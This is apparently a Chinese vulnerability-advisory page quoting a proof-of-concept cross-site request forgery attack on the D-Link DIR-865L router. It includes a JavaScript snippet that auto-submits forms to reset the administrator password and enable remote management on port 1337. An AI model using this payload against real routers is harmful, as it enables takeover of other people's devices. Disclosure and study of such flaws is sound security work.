链接:http://secunia.com/advisories/53064/ http://securityevaluators.com/content/case-studies/routers/dlink_dir865l.jsp *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Jacob Holcomb ()提供了如下测试方法:
In the following proof of concept attack, we assume that a device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator"s router, from the administrator"s browser. Since the administrator has a current session established with the router, the form submissions are processed.
The first form (Figure 1) is pre-filled out with the information required to set the administrator password to "ISE" and enable remote management on port 1337. The second form completes the action, by instructing the D-Link to save the settings its been given.
<script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script>
At this point, the attacker can remotely administer, and thereby remotely control the router.建议: -------------------------------------------------------------------------------- 厂商补丁: